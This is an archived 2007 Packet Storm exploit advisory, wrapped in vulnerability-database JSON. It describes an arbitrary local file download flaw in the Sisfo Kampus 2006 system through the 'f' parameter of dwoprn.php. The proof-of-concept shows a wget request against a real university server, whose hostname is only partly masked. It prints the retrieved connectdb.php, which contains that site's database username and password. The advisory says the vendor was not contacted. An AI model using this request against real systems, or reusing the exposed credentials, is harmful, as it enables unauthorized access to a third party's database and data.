ID PACKETSTORM:59208
Type packetstorm
Reporter k-one
Modified 2007-09-10T00:00:00
Description
`original File name : PUPET-SisfoKampus2006.txt
date releases : September 10, 2007
Information :
=========================
Advisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability
Author: k-one A.K.A PUPET
Website vendor : http://sisfokampus.net/
Problem : All Local File can downloaded
POC :
=========================
http://[h0sT]/[dir]/dwoprn.php?f=connectdb.php
[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php
--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php
=> `dwoprn.php?f=connectdb.php'
Resolving ***.*****-subang.ac.id... 203.130.***.**
Connecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 292 [application/dwoprn]
100%[====================================================================================================================================================================>] 292 --.--K/s
07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292]
[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php
<?php
// file: connectdb.php
// author: E. Setio Dewo, Maret 2003
$db_username = "t26924_siak";
$db_hostname = "localhost";
$db_password = "siakang";
$db_name = "t26924_siak";
$con = _connect($db_hostname, $db_username, $db_password);
$db = _select_db($db_name, $con);
?>
Vendor Response:
==============
Not contacted yet
Patch :
=============
No Patch Available
This bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana)
`
{"hash": "58f72a900e0539e985d7bff385d3b6100e38be4a35f27a438a05ddedf3d6a1b8", "sourceHref": "https://packetstormsecurity.com/files/download/59208/PUPET-SisfoKampus2006.txt", "title": "PUPET-SisfoKampus2006.txt", "id": "PACKETSTORM:59208", "published": "2007-09-10T00:00:00", "description": "", "modified": "2007-09-10T00:00:00", "sourceData": "`original File name : PUPET-SisfoKampus2006.txt \n \ndate releases : September 10, 2007 \n \n \n \nInformation : \n \n========================= \n \nAdvisory Name: Sisfo Kampus 2006 Local File Downloaded Vulnerability \n \nAuthor: k-one A.K.A PUPET \n \nWebsite vendor : http://sisfokampus.net/ \n \nProblem : All Local File can downloaded \n \n \nPOC : \n \n========================= \n \n \n \nhttp://[h0sT]/[dir]/dwoprn.php?f=connectdb.php \n \n \n \n \n \n[pupet@vps ~]$ wget http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php \n \n--07:30:16-- http://***.*****-subang.ac.id/dwoprn.php?f=connectdb.php \n \n=> `dwoprn.php?f=connectdb.php' \n \nResolving ***.*****-subang.ac.id... 203.130.***.** \n \nConnecting to siak.universitas-subang.ac.id[203.130.***.**]:80... connected. \n \nHTTP request sent, awaiting response... 200 OK \n \nLength: 292 [application/dwoprn] \n \n \n \n100%[====================================================================================================================================================================>] 292 --.--K/s \n \n \n \n07:30:22 (2.78 MB/s) - `dwoprn.php?f=connectdb.php' saved [292/292] \n \n \n \n[pupet@vps ~]$ cat dwoprn.php?f=connectdb.php \n \n<?php \n \n// file: connectdb.php \n \n// author: E. Setio Dewo, Maret 2003 \n \n \n \n$db_username = \"t26924_siak\"; \n \n$db_hostname = \"localhost\"; \n \n$db_password = \"siakang\"; \n \n$db_name = \"t26924_siak\"; \n \n \n \n$con = _connect($db_hostname, $db_username, $db_password); \n \n$db = _select_db($db_name, $con); \n \n \n \n?> \n \nVendor Response: \n \n============== \n \nNot contacted yet \n \n \n \nPatch : \n \n============= \n \nNo Patch Available \n \nThis bugs Discover by : k-one A.K.A PUPET (Join our community at irc.indoirc.net #safana) \n \n \n`\n", "reporter": "k-one", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "283c864e9658e002d8b5924ba642fc55"}, {"key": "modified", "hash": "17e0dd5365bc2b22db88536fee055aca"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "17e0dd5365bc2b22db88536fee055aca"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "6741465d15c14b5d17480336ac16bc20"}, {"key": "sourceData", "hash": "af6f8bb6d6534d0d805e2a0d5b08135e"}, {"key": "sourceHref", "hash": "e7a97af1fcae91acf68a952177f8c333"}, {"key": "title", "hash": "23653f6f134c475e3d40c85a5581c5ec"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/59208/PUPET-SisfoKampus2006.txt.html", "lastseen": "2016-11-03T10:19:09", "viewCount": 0, "enchantments": {"vulnersScore": 3.3}}
{"result": {}}